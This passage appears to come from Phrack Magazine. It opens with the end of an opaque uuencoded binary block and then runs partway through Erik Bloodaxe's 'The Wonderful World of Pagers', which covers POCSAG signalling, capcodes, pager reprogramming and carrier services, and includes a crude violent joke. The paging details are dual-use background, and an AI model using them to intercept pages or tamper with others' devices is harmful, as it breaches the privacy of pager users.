MP>/!QSQXP>'!_\'OP?QPP>'![^7_S?_!\,'_P?#!^<'\8<'P?\+_P?Y`?`'!6
M\%=\8''!^,'@P<'!Q\'`/'!YP?_!\<'SP?'!X\+_PC_!V'@X?GS!_,/QP?_!\
MW\'F?'_!_`P./YQPP?_!X\'SP?_"X\'A@,+_/\'`8,'QP?@"O\'D?'_!^,'@7
MP=X>>,'_P?C!\`#!\'_!_Y_!_G#"_P#">&'!\,+CG\'\.,'_P?AP/#^\.,'P%
MP>'!Y\'_P<`\/\'\?\'_F'C!X\'/P?^/P>,!@'X`P?!OP<`<P?[!^,'VP?'"*
M_\'GP<9^>,'AP?_!Y\'\<,'QP>_E_\W_P?/!_\']P__!^,3_P?#!_\'WP?C"1
M_\'P><'\P?!QP>/!X'S"<,'_P?#!\\'QP>!_P?_"?\'\<#C"?,)XP?#!\<'_0
MP>/!]GQ_P?P\/C_!_GC!^,'CP?/!_\'SP>/!\</_/\'HP?C!\<'_P?`_P>Q\)
M?\'\8,(^>,'_P?C"\,'X=\'_P?Y^<<+_.<'X<''!^,'@P>/!_\'X.,'_P?@@F
M?C_!_#C!^&'#_\'^?\'\?\'_O'C!X<'OP?_!X,'C,'!X<,'PP>/!X#Q\>#!@)
MP__!X'YXP>!SP>?!_,'PP?G!Y^7_S?_!\]#_P?!_P?_!^'O!X\'PP?\`P?C!>
M_\'PP?/!^\'@/\'_PC^>`!Q^'`!YP?!AP?_!X!Y^?\'^#,(?GGC!^,'#P>/!-
M_\'CP>?!XY_"_Q_!S,'^P?G!\\'A'\',?'_!_`@?'GC!_\'XP?#!^\'_P<?"6
MGS\SPO\_P?@`8\'YP<`#/\'P''_!^``>/QPXP?!@PO\?P<\_P?Q_P?^>>,'CX
MP<_!_P`#'CX8>&'!PQX,?'@88,/_P<9^,,'@`\'GP?C!\<'_P</E_\W_P??/D
M_\'^?G_&_\'?P?[%_W_!_\*_P=^'G\(?`\'_P?X'P?_!X!_"/\'_PQ^>/@/!W
MQ\'GP?_!P\''P>>/G\'_#PX>>\'SP>,/CCX_P?X.'QX<?\'\?,'_P=_!QY_"S
M'P/"_Q_!_@]GP?F"!Q^`'G_!_A["'PX8`'`?P?\?CQ_!_C_!_YX9P>?!S\'_F
M``\>/QY_P<?!PQ\./AP87L/_#C\;P>`#P<?!_,'"#\''Y?_=_\'^#G_4_S^?-
MC\+_#\'_P?X_P?\_P?_$'WX'P<_!Y\'_P>/!S\'GAQ_!_P\?#'_![0>/'CX_.
MP?\.'QX^?\'\?#[!SX>?PA\'PO\?P?X_P>?!^8_"'P\>?\'^?P\?#AP'?@_!Y
M_Q^//\'^/\'_'AO!YX_!_P8/'C\>?\''!Q\./CQ\?G_"_PX_!\'C@X?!_,'`C
M!\'/Y?_>_P?D_Y_!_P_$_\+OP<8?P?\&'P?!_\'^!X8?PC_!_P[#'W_!_CX'3
MP<<'C\(?AY_!_Q_!_C\GP>N/P<\?#QY_P?Y_CQ\/'Y_!_X?!_Q^//\'_/\'GF
M#P?!QX_!_P_!_Q]_C\'_P<('/PX^/W@.?\+_#C\'P<?!_\''P?_!P@?!Q^7_'
MWO\'\/\$?X?!_\'^#\'@/\'_/\'_'C\>/,'_P?P^`<'@#X_"'X>/P?\_P?X^/
M,<'APL?"'QY_P?Q_CQ\>/<+_P>?!_Q^//\'^/\'G'P/!YX_!_P_!_QY_G,'_;
MP<`'/PP^/,'X`'_"_X0_`\'GP?G!Y\'\P>"CP<?E____T/\_Q?_!^<G_P?W!5
M_\'AP?!_P>?"_\''P>_!_S_!_B!X8<'AP<<_*!A_P?C!_\'//3PXP?C!Y\'C2
MP?_"OS_!_S_!XY\!P>/!S\'_C\'_/G^8P?_!X<'_/[Q\>,'P8,/_P>!_(<'AC
MP?G!X\'XP?'!\,'CY?___]#_/]+_P?C$_\'/Q/_!X,'X0<'P#\'_P<`0P?_!Z
M^,'_P<^`/'APP>'!X\'_P=!^?\'_,\'CG\'#P>/!S\/_P?Y_N,'XP>/!]G_!Z
M_'QXP?#$_\'@?G'!X<'QP>/!\,'QP?#!X^7____0_W_<_\'PP?AQP?!_P?_!-
MX,'XP?_!^,+_P>#"?&'!\&?!_\'@?G_!_\'@=\'_PN/![\/_?GA\>,+S?GS"J
M>,'XP?S#_\'@?G'!\<'XP>/!^,'QP?#!\^7____H_S_'_\'YPO_!\<7_P<!_I
MP?X#P?`?P?_!X,)_P?_!P#_!W\''P>?!S\'_'\'_/P!^<,'QP<<('CAXPOC"7
M_\'/P<(^<<'AP?'!X\'XP?/!\,'CY?___^?_P?X?T__!W\'_G\7_P<8?G\'?F
MP?_!W\'_G\'_'X!^`\'P#X`?`#[!_AC"_\''AQX[PL/!Q\'\PO/!Q^7____H#
M_S_E_X_!_P_!_@^&'P1_P?X'P>?!_\'&#PQ_P<$'P<?!_,'S!\'/G^3_____;
M_];_C\+_#\'GP?_![Q^'P?_!Y@^/POX'P<\?Y/______VO_!]\3_P?W!_Y^/D
MP?[!_P_!S[_D_______:_\'SQ/_!^,/_P?S"_\'OY?_-_\CPP?'!\,/QP?#!$
M\<'Y___\_\'SQ/_!_L/_P?Y_Y__-_\'PQ6#'<,'P<,'PP?G!^,+_P?W!^___8
M^__!_L3_?^?_S?_!^\'XP?'!^,'P8,-`<,-``,-`Q`#"0&!PP_#!^,/[P__!*
M^______;_]'_P=_%GP\>#PX?#PK"!LH"!L,.PA\/PQ_!W______7_^+_PY\?O
MQ`\'#\D&#L(&RP^?O\'?O______%_^C_P=_#C\,/!P\'#\,'QP;&!\0/PX^?I
MP_^?PM_"_\'?___W__;_O\'_O\*?K\(/P@["!,(`!,4`!,0`!,(&!\,/CQ^_^
MPO^_PO^____L__W_P_W!\<+PP>#"8,D@Q@#$(,/@8,'@8,'@8,'@P?'!\,+YI
MPOW__^/_S?_!_F/!X,'WP?S"]\'@P?_!\,'\P?'!X,'WP?#!^,'\P?/#_\'WZ
MZ/_!^<+QP?C!\,'QP_#"X,+PP>#+8$#$8,7PP?'__]S_S?_!_'/!X,'WP?C!/
M\\'WP>#!_\'P?&'!X'?!X,'P?'/!_\'SP?_!\</_P?GK_\'XP?W!\,/XR/!P$
MP?#$<,5@<&##<,'PP?C!^<'[Q/W__]/_S?_!Q'O!W,'GP<QAP>9XP?_!PWS!;
M^YO!XQAP>$'!_@'!S@'!\<'_P?/!P'O!\X#!\'_#_\'XP?_!_L'Q]/_"^\'X@
MP?#"0,(`0,8`0,(`0'!@<,'PP?C"^</[P?G!^___Q?_-_\'.?Y_!YXY#P<8^$
MP?^/GL'_G\'F'G><&\'^`XX+P>/!]\'GP<`_P?<`8!_!_W\_P?X?P?X'G@_&T
M_\'?[_^?C@X/#@(.`LH`Q`+"!@\"!@X/PQ___\W_P<\/C\'GCD5.?\'_G\'.+
M'X_!YS_!_\'^/\'^/XX_P>'!Y\'#P?P_P?<>9Q_!_C\?,@_!_P^.#Y_!QC_"4
M[\'_!\'OA\'_?L(/PO\/PO_"#\'_/Y_"_\'?Y?\/CP_"'\</#L(&!,@&#L4/5
MPQ_U_\W_P<\'A\''CD<&?\'_'\'.#X?!YS_!YYX/P?\?CW_"Y\''P?_!]\'G@
M'F?!_\'^/AXWA\'_PH\/G\''/\'/P<?!SP?!QP?!_G["!\'_;@_!_W_"!\'_/
M'P_"_X_#_Y^/YO_#G\2/Q0\'P@_"!P;"!\,&PP?)#X\/PH^?Z/_-_\'/@\'\>
M)XY&!G0_O\',!X?!YG_!\`P!P?\'A\'_P>!GC<'\P?/!XQYGP?_!_#X.<\'S9
MP?^/PY_!S\'_P<QCP<X<9Q[!_#_"'\'^<!_!_CP'`,'@#@3!Y\'_@,'OP<_!4
M_!\'P>0_P>0_Q/_![Y_!_[^?P?^_Z_^_G\(/#`3+``0`P@8$!P\?OY^_G[_!T
M_\._VO_-_\'GP?'!^&?!S&0$<'^_P>PG@<'F?\'P.`'!_X&`P?#!X&?!R,'XK
MP?'!\R!@P?_!^#P,PO'"_\._P>_!_\'LP>'!YGQB?\'X?SY_P?YQP?_!_#TOX
MPN'!SC!AP>>@P>/![\'P?"'!X'_!X#W$_\'@.<'@?"/!_\'CP>#!_\'@PO_!P
M\<'YV?_!_<[_POW!\,/@Q&#!X,(@`"#%`,8@8,,@PF#!X,/QP?7!_=+_S?_!2
MX,'PP?AAP>!BP<!X?\'_P>S"_\'R?\'QP?C!\<'_P?#!P,'P8&/!P,'XP?'!$
M\P#!\'_!\<'\8,+QQ?_!X,'_P=S!\,'F?&!_P?!_?G_!_G'!_\'X/\'_P?/!0
MX\'B>&#!\\'_P?'!_\'QP?C!\,'@P?_!X,'YP?_!Q\'N?L'P>,'@P?C!\\'\T
M8<'@?\'@?F/!X,'P?,'_P?##_\'\P?/1_\'\VO_!^<'PP?C'\,'@P?#!X'!@O
MP>#$8'#&8,'@P?#/_\W_P>#!\'APP?ACP>!X?\'_P?S"_\'P?L'QPOC!_L'XA
MP>#!^'#!XV#!^,'QP?-PP?#!_\'PO'#"\<7_P>!_P?C!\,'V?&!_P?!_?G_!)
M_'#!_\'X?\'_P?/![\'@>&#!]\'_P?!_P?'"^,'WP?_!\<'YP?_!Y\'\?,+X4
MP>#!^,'_P?QQP>#!_\'@?'/"\'S!^<'@?\+_P?AQT?_!_.#_P?O!^<']POG%&
M^,3PP?C#\'#!\,-@S__-_\'L`<'`<!S!Y\''@'_!P#S"_\'W@'#"^,'\>,'$7
M>&/!PP#!^,'QP?-\<\'_P?`<<'/!\<'_P]^?P>'!_\'<P>)&?F)_P?`_?@/!1
M_G`?P?C!W[_!\\'/P>(`8&.!P?A_P?#!^<'\9\'?P>/!V<'_`\'.'L'\P?G!)
MY\'XP?_"^,''P=_!Y\'&PO_!\\'X><'@'X_!S\'X`-'_P?W!_\'QP?_!_L'[8
M[__!^\'XP?G/_\W_P<\'@GH>P>^/@'_!P!_!_Y_!YX)R'L+^'8X>)X<.?\'[5
MP<<^9\'_P>`.,'/!\\'_Q)_!S\'_GD8&?D9_P>(?/@_!_@(?P?G"'\''C\'FP
M`$('`L'\/\'P&<'^1Q_![Q_!_P?!SA[!_L'YP<?!_!_!_L']CY_!QX[!_Q_!O
M_\'\?<'/'P^/'QY_TO^#P?_!_@>/___!_\[_G\7_P<_&_X_!_@_"_P?!SP9O0
MP<_"/\'^#SYG'\'GCCPSA\'_PH^?'\'/P?^.9P\^!S]`'\(_P?XOP?_!^`\?U
MP>>/P<8.9P</P?Y_P?(=P?X$'\'@'\'_%\'.#G]]P<8\#\'_P?X''\'/P<;")
M#\'G/!W"CP^''\(_TO\./Q_"#___P?_=_P_"_P_!WX=_P>_"?\'_#\'_9A_!*
MY\'./C</P?^/PI\/P<_!_X[![X\>1Q\'#\(_P?XGP?_!X@\?P>>/A@Y'!X_!C
M_L'_P?>_P?X''\'''\'_!\'.#\+_ASX/PO\&'\'/AL('P<8>'\*/!X>?'S_2P
M_P\^'\(/___!_^C_O\+_'\/_P?P/P?_!WY^_A<'`/Y[!_XX!P>>,PL\_#\'^[
M?\'_P>>/G\'GP<>&/F>'G\'^P?_!]\']P?[!QY_![\'_P?X!P<YDP?[!_<''"
MP?R_P?W!_(<?P>?!Q@\'P>0\B<'/C@>/G\(_TO^?/A^/'___P?_O_\']Q?_!@
MX<'@/\+_P>\!P??!X<'OPO\AP?[!]\'_P>?![\'_P>?!X(Y\8\'GN<'\P?_!&
M\\'XP?G!Y\'_P>_!^<'\(,'NP?#!_,'YP>?!^,'_P?C!_<'GO\'GP>3!_[_!J
MX<'XP>'![\',(\'YO\(_T/_!_<'_OSR?P?\____!__7_P?/!^<3_P??!_\'S+
MP__!\</_P??#_\'P?L'^P?/!Y\'`P?S!_\'SP?QQP>?!_\'GP?C!_,'PP>S!:
M\,+XP>?!^,'_P?C!\<+_P>/!Y,+_P?/!^,'AP?_!T`'!^#_!_W_0_\']PO_!+
M^,+_P<#__\'____*_\'XQ/_!\,'\P?_!\\'^<</_P?A\P?C!_,'XP?S!^,'_]
MP?C!_\'XP?'"_\'@?,+_P?'!^,'QP?_!^''!_,-_T/_!_<'_P?YXPO]@___!&
M____S__!^\C_P?QOP?[#_\'YP?_!_<'_P?X#PO_!X'X#P?_!\'C!\<'@&,'Y;
MP=S#/]#_P?W!_SX8#\'?F___P?___^/_#\+_P>8^!\'_P?`?P?O!PAO!_Y\?K
MPC_2_QX8#Y\?___!____Z_\?P?_![W_!_\'?/[\_TO\>/P>/#___P?____/_R
M/]+_#V?!YY\/___!_______%_\']P?^'P_^$___!_______%_\']___'____G
M___%_\']___'_______%_\']___'_______%_\']___'_________\W_____L
M____S?_________-_______%_\']___'_______%_\']___'_______%_\']1
M___'_______%_\']___'_______%_\']___'_________\W_________S?__W
M_______-_______%_\']___'_______%_\']___'_______%_\']___'____%
M___%_\']___'_______%_\']___'_________\W_________S?_________-]
M_______%_\']___'_______%_\']___'_______%_\']___'_______%_\']`
M___'_______%_\']___'_________\W_________S?_________-________T
M_\W______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7__
MP?W__\?_________S?_________-_________\W______\7_P?W__\?_____\
M_\7_P?W__\?______\7_P?W__\?______\7_P?W__\?______\7_P?W__\?_P
M________S?_________-_________\W_________S?______Q?_!_?__Q___5
M____Q?_!_?__Q_______Q?_!_?__Q_______Q?_!_?__Q__________-____$
M_____\W_________S?_________-_______%_\']___'_______%_\']___']
M_______%_\']___'_______%_\']___'_________\W_________S?______O
M___-_________\W______\7_P?W__\?______\7_P?G__\?_SO_!^?__]?_!2
M_?__Q__._\'YP?O___3_P?W__\?_S?^&`@`"`,D"Q`8.Q1\/P=______Y?_-X
M_X\'Q08.Q@;$!,(&PP\.PP\?G______B_]#_P=_"G\/_P<^_G\*/#X_&#\T'0
MQ0_"C\.?P?^/_____]#_X/^_PO^_PH\/!L0$QP`$P@8'P@^/GX^______\__J
M[/_!_<+YPO'!^,'QP?#!X"#!X,(@P@#)(,)@P?'!X<'@P>'!\<']]__!_?__$
MQ__S_\'[QO#!X,'PP>#&8$!@0,)@P>!@P>#!\,+QP?#!_\']\O_!_?__Q__-Q
M_\'\P?_!\<3_P?/!_\'PP?S!^\'YP?_!^<'XP?W?_\+]P?_"^</XQO#%<,)@_
MQ'#&\,']P?_#^,'[P?W"^=[_P?G__\?_S?_!_`_!X<3_P</!_\'PP?Q[P>'!K
M_\'AP?#!_>O_P?/!\,)@0'#$0,8`0&!`PG#!^&#"X,/PP?O!_\+[VO_!^?__A
MQ__-_XX'!L''CL''P<\.P?^&'`<&P<X"P>(<!QX/P__!_G\^#\+_P?X?P=_!8
M_Q_!W^;_PM^>P@_##LD"`,("Q@8/#A^?P=___];_S?\,#PY/CD>/#\'_CQ["N
M#XX.9QP''`_!_W_!_\'^/SX/PO_!_@^/P?X/C\+_'^;_G\+?GQ_'#\,.R`8.-
M!@\'Q0_#'\'_O___S?_-_XX?#\''CD>./\'_'X_!_Q_!SA_!Y\'_P?>_C\'^G
M/\'^?L(_C\'_P>?!_P>&,P\'P<8>!\'_P<_![\'_!\'_P<_"_X_"_\'/ZO_#9
MC\(/C\0/P@?$!@?"!L,'PP^/P@_"CY_!W___P?_-_XP_#\''C&&&?\'_/XS!6
M_Q_!SG_!Y\']P?/!_<'_P?P]P?A^/CS"_\'AP?F'C#`'#\'`'`?!_X_!Y\'OO
M`\'_A<+_A\+_P<;&_[_!_[_J_[^?CP["!@`$QP`$P@#"!,(&P@___\W_P<PCY
MP>#!YXC!X,'D<,'_O\'L)@'!Y,'_P>!XP>'!^,'_P?@YP?!^PCS"_\'@P?G!B
M\;\QP>,_P>/!^,'SP?_!Q\'AP><XP?_!X&?!Y[!YP?/!P,'_P>_"^<'OP><AK
MP?`X(_'_P_W!\,'YP?'!\,'@8"!@Q"``PR#&8,/@Q&#!X"#"8,'@P?##^>;_%
MS?_!W,'CP>#!Y\'8P>#!P'#"_\'L8@#!Y,'_P>!P8\'X?\'X><'P?,(XPO_!/
MX,'YP?'!_\'QP>-_P>/!^,+_P</!X<'G>,'_P?AGP>;!^'#!\\'QP?_!S\'Y@
MP?'!Q\'F(,'P>&/Y_\'XP?G'\,'@8,'@Q6!`PV#%0,(`0&!PP>!@PN#$\,+Q2
MPO#<_\W_P?G!\<'X9\'XP>8@>,+_P?S!_GG!Y,'^P?#!^,'SP?[!X\'XP?'!2
M\'QP>'_!_\'@><'YP?_!\&,PP?#!^'_!_\'QP?#![GQ_P?Y@P>9^>,'SPO_!R
MX\'XP?'!Y\'F>,'QP?C!\?__Q?_!^<'PP?S!\,'YP?C!\,/XS?##<&!PQ&!P;
M8,)PPO##^=/_S?_!R<'SP?QGF,'F`'Q_/\'<P?]_P>3!_L'CP?C!\\'_P>/!!
M^<'!P>`^0#AOP?_!P'G!^;^P`P#!\'@/P?^QP>#![WY_P?Y@P<9^>,'SP=_!B
M_\'#N<'QAX9XP?/!^,'S___:_\'[P?_!^\'PP?/!X,'PPF##0,4`0,)@<,'Y[
MP?O0_\W_P<X#'@<>P<>&''^/'L'_'\'.'F?!_\'[P?_!]\'_P<'!PA[!PSS"4
M_X`[P?N?$X<?P?\?@\'_`<'N#\(_@$`.?QL3@L'_@YG!^X<'#,'WP?S!T___6
MYO_!W\(?'@X&Q@+/_\W_C@<,)QY/CPQ_CS_!_S^/#V>_PO_!Y\'_P>.''L''<
M/\+_A#_!_Y\WP<\?P?\?A\'^`<'O#\(_AT<.?QL7A\'_#QW!_X</!<'G/`?_J
M_^O_O\0/#@?/_\W_P=\/A\'O'\'OCX?!_\''/\'_O\'/!\'F#\'_P?X'PO_".
MC\''/@_!_X\?AY\WP<<?P<^/P?_!_@?![P_"/X_!Q\'//Q^'C\'_CQ_!_X</_
M!L'G/@?___'_P=_/_\[_O\'OP?]_PO^/P?_![\3_A\'@'\'_P?X/PO^?P=_!8
MYSP'P?^?N`>,-\'G#\''F<'QP?X(P>\//G^?P>?![CX[@Y_!_YP=P?N0+QS!Z
MY\'\!______"_]S_P?W)_\'\8\+_P?AGP>#!^\'S`,'@."'"_,'OP<\@PO_"`
MYSAYP>/"_\'\.,'QF&=\P?/!^,'S_____\+_ZO_!^,'_P?'!_\'WP>#!\'QG4
MPOS!_\'O8,+_PO?!X,'[P>/!X,'_P?YXP>'!^,'F>,'SP?#!\______"__?_W
MP?O$_\'PP?O!\\'@P?_!_L'X8\'XP?9PP?#!^,'S_____\+____!\,+_P?X?$
MP?W!_P#!\#G!^______"____Q/_!W\+_P=_!_A______P__________-____J
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_-_\,/PA_"GS_!_\*?______3_'
MS?_#!\4/Q(_$G\'_G[_"W______J_\W_CL($T``$`,,$`,(&P@["#Q^_G[_"R
M_\*______]C_S?_!^,'PP>!@Q"!@Q2``(,H`PB``PR#!X&!QP?#"X<'QP_W_@
M____U?_8_\'[PO_!^\'_P?G!_\'PP?',\&#"X,1@0,1@P>#!\,'@Q?#_____F
MR__@_\']P?_!_<'XP?W#^,'YP?S"^,3PQ'!@<,1@<&#"<&##<,'XPOG!_?__G
M___&__O_P?O!^,/P8,'`0,@`PF#!\&!XP?#!^?__^?_]_\+?PI^/#L("``+%.
M`,,"!@(.'@^?PM____3____)_[^?Q0\.PP\.R`8.!LH/PA_!_\'?P[___]S_7
M___,_X^?PX\/CP^/#\,'QP8'PP;%!\0/C\(/C___V____]S_O\'_OY^_P?^/'
MP@\&Q`3'``0`!`7"#Y\?PK___]'____A_\']P?O"_\']POE@P?#!X,)@QB#"1
M`,4@8,'AP>#"\</]___*____P__!]^__POG%\,9@PD#"8,'@8,'PP>#!\,)@\
MP>#(\,'QP_#!\\'YP__!^>W____"_\'^<\/_P?GM_\3XPO!PP?!PP?##<,I@I
M<,5@QW#&\,+XP?#!_\'YP?O!_<'YY/___\+_P?1SP__!P'_!_<+_P?G!\'_!D
M_`'&_\'XZ__"^<'_P?O!^,'[P?_!^\'XPO!PPD#"8,-``,=`S`##0,'@<,'[<
MP?G:____PO_![G_#_XX_Q/_!\'_!_@/&_\'^'_;_PI_"WY\?P@X>#QX?'A\.<
MP@8"#L4"Q0#"`@#"`@X?#\*?U?___\+_P<X?A\'G?Y\?P?["_\'\9\'_P?X_<
MPO\_PO_![\'_#\;_/\'&'\/_AW_)_\'?]O^_GQ^?'\(/PP[(!@["#\_____"N
M_\'.#X?!QW^/'\'?P<?!_\'J9\'_P?[!_\'/P?\_PO_![\'_A\'_G\3_/\''O
M'\/_AW_)_X_]_\'OPH_$#\,'PP8'S____\+_P<\'C`8_A#>,P<9_P>1@?\'^0
M'X3!P#@<9,'GP?_!]\'_G[\?P?\^/\'/G\'_P?Y_CG_$_\'?Q/\`Q?\'P?_!&
M[\'_P>?^_Y_"O\_____"_\'OP>&`8'^`<\'(P<!_PN!_P?PCP<#!X#`X8,'GS
MP?'!\\'_O3P_P?Q^?\'OP?W!_\'\P?^\><'_P?O!_\']Q?\PQ/_!_B'!_\'CK
MP?_!X,3_P?G__\S____"_\'OP?B`P>#!_\'0<\'HP<!_P>#!_L'_P?QSP<!/Q
M(+G!^&?!\$/!\<'XP>#!_\'XP?9_P?_!_,+FP?_!^''"X,+P/<'_P?C"_\'\#
MPO!_P?_"^,'_P?'!_\'@?\/_P?#!Y___R____\+_P>S!^,+PP?_!^'/!^,'@Z
M?\'@PO_!_'-`?F`YP?AGP?!C<<'XP>#!_\'XP?Y_P?_!_,'^P?;!_\'P<<'PQ
MP>#!\'`]P?YX?\'_P?S"\#Y_P?C!^<'_P?'!_\'\?\'YPO_!\,'G___+____*
MPO_!S''!V,'APO\SP<C!S\'_P<!_O\'\P?\!P<\@P?G!X&?!\<'C><'8!E_!"
M\<'F?\'_P?S!\,'F?X#!Y[S!W\'@(\'(P>9YP=_!_P#!X&'!S&?!^<+_P>/!/
M_\+?P?!X?\'SP>?!S\'_P>?!\G___\;____"_\'.`X_!SG\?$PS!S\'_@'^?F
MP?[!_Q_!SP?!^\'&9\'[P<<[G`X?P>?!YG^?P=[!YL'.?X?!YQX?P<8'C\'&Z
M.9_!_P+!W@>>'\/_A\'_PI_!PG@?P??!QP_!_P<&'P]____$____PO_!SP_!K
MS\'OP?^?/@_!QG_!_V8?PO^.P<XO'XXGP?_!]S\/P=^'P?_!SW_!SXYWP>Y_V
MG\'O'@_!Q@^/P<=X#\'_#\'L#Y\/P_^'P?_"C\'/'X_!_@8'/P?"#@<?___$R
M____PO_![X_%_Q_!Y\+_P>8_PO^'P<8O'XXGP?_!YP?"CX?!_X]_P<\.=\'.&
M?Y_![QX/P<\/C\''?Q_!_Q_!Q@^?#\/_!\'_PH_!SY^/P>(&!R<'P@X''___C
MQ/___]3_?\'G?\'_P?<#G`X/P?P?P?_!QA[!\\'N?Y_!YXR.P<<G#,'&><+_R
MOXPGG\''P_\0P?^?C\'/EX_!\00#!@,^'@<?___$____V?_!X\'\/#_!^#_!P
M_\'P?\'QP?["_\'GP>'"X'`\P>9XP__!P&?!_<'GP?S!^,'_<,/_P>^QP>_!-
M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S
M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE
MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_&
M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1
M/___Q/______R/]____$_________\W_________S?_________-________S
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2
MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/'
MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P</!\0/1
/!]0/C\2?C\F?SK___]#_K
``
end
sum -r/size 36774/43500 section (from first encoded line to "end")
sum -r/size 656/73815 entire input file
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 8 of 28
****************************************************************************
The Wonderful World of Pagers
by Erik Bloodaxe
Screaming through the electromagnet swamp we live in are hundreds of
thousands of messages of varying degrees of importance. Doctors,
police, corporate executives, housewives and drug dealers all find
themselves constantly trapped at the mercy of a teeny little box:
the pager.
Everyone has seen a pager; almost everyone has one. Over 20 million
pagers are on the streets in the US alone, sorting out their particular
chunk of the radio-spectrum. Another fifty-thousand more are
put into service each day.
But what the hell are these things really doing? What more can we
do with them than be reminded to call mom, or to "pick up dry-cleaning?"
Lots.
** PROTOCOLS **
Pagers today use a variety of signalling formats such as POCSAG, FLEX
and GOLAY. The most common by far is POCSAG (Post Office Standardization
Advisory Group), a standard set by the British Post Office and adopted
world-wide for paging.
POCSAG is transmitted at three transmission rates--512, 1200 and 2400 bps.
Most commercial paging companies today use at least 1200, although many
companies who own their own paging terminals for in-house use transmit
at 512. Nationwide carriers (SkyTel, PageNet, MobileComm, etc.) send
the majority of their traffic at 2400 to make the maximum use of
their bandwidth. In other words, the faster they can deliver pages,
the smaller their queue of outgoing pages is. Although these
carriers have upgraded their equipment in the field to broadcast at
2400 (or plan to do so in the near future), they still send out
some pages at 1200 and 512 to accommodate their customers with older
pagers. Most 512 and 1200 traffic on the nationwide services is
numeric or tone-only pages.
POCSAG messages are broadcast in batches. Each batch is comprised of 8
frames, and each frame contains two codewords separated by a
"synchronization" codeword. A message can have as many codewords
as needed to deliver the page and can stretch through several batches
if needed. The end of a complete message is indicated by a "next address"
codeword. Both addressing and user data are sent in the codewords, the
distinction being the least significant bit of the codeword:
0 for address data, and 1 for user-data.
Standard alphanumeric data is sent in a seven-bit format, with each codeword
containing 2 6/7 characters. A newer 8-bit alphanumeric format is
implemented by some carriers which allow users to send data such as
computer files, graphics in addition to regular alphanumeric messages.
The 8 bit format allows for 2.5 characters per codeword.
Numeric data is 4 bit, allowing up to 5 numbers to be transmitted per
codeword. Tone and voice pages contain address information only.
(NOTE: Pager data uses BCH 32,21 for encoding. I don't imagine
very many of you will be trying to decode pager data by building your
own decoders, but for those of you who may, take my interpretation
of POCSAG framing with a grain of salt, and try to dig up the
actual POCSAG specs.)
** THE PAGING RECEIVER **
Paging receivers come in hundreds of shapes and sizes, although the vast
majority are manufactured by Motorola. Numeric pagers comprise over
fifty percent all pagers in use. Alphanumeric comprises about thirty
percent, with tone and voice pagers making up the remainder.
Pagers are uniquely addressed by a capcode. The capcode is usually six
to eight digits in length, and will be printed somewhere on the pager
itself. Many pager companies assign customers PIN numbers, which are
then cross-referenced to a given capcode in databases maintained by
the service provider. PIN numbers have no other relationship
to the capcode.
Tone pagers are by far the most limited paging devices in use.
When a specified number has been called, an address only message
is broadcast, which causes the intended receiver to beep. Wow.
Tone pagers usually have 4 capcodes, which can correspond to
different locations to call back. Voice pagers are similar, except
they allow the calling party to leave a 15 to 30 second message.
The voice message is broadcast immediately after the capcode of the
receiver, which unsquelches the device's audio.
Numeric pagers, although seemingly limited by their lack of display
options have proven otherwise by enterprising users. Most numeric
data sent is obviously related to phone numbers, but numerous users
have developed codes relating to various actions to be carried out
by the party being paged. The most prolific users of this have
been the Chinese who have one of the most active paging networks
in the world. I suppose the next biggest users of code-style numeric
paging would be drug dealers. (2112 0830 187 -- get to the fucking
drop site by 8:30 or I'll bust a cap in your ass!) :)
Alphanumeric pagers are most often contacted through a dedicated
service that will manually enter in the message to be sent onto the
paging terminal. One such service, NDC, offers its phone-answering
and message typing services to various pager companies. Next time
you are talking to a pager operator, ask him or her if they are at
NDC. They probably are.
In addition to the capcode, pagers will have an FCC ID number, a serial
number, and most importantly, the frequency that the device has been
crystaled for imprinted on the back of the device. Although technology
exists that would allow pagers to listen on a number of frequencies
by synthesizing the frequency rather than using a crystal, pager
manufacturers stick to using crystals to "keep the unit cost down."
Pagers may have multiple capcodes by which they can be addressed by.
Multiple capcodes are most often used when a person has subscribed to
various services offered by their provider, or when the subscriber is
part of a group of individuals who will all need to receive the same
page simultaneously (police, EMTs, etc.).
Most low-cost pagers have their capcode stored on the circuit board
in a PAL. Most paging companies will completely exchange pagers
rather than remove and reprogram the PAL, so I don't think
it's worth it for any experimenter to attempt. However, like most
Motorola devices, many of their paging products can be reprogrammed
with a special serial cable and software. Reprogramming software
is usually limited to changing baud rates, and adding capcodes.
Additionally, some units can be reprogrammed over the air by the
service provider. Using a POCSAG feature known as OTP (over the air
programming) the service provider can instruct the paging receiver to
add capcodes, remove capcodes, or even shut itself down in the case
of non-payment.
** SERVICES **
With the growing popularity of alphanumeric pagers, many service providers
have decided to branch out into the information business. The most
common of these services is delivery of news headlines. Other services
include stock quotes, airline flight information, voice mail and
fax reception notification, and email. Of course, all of these services
are available for a small additional monthly premium.
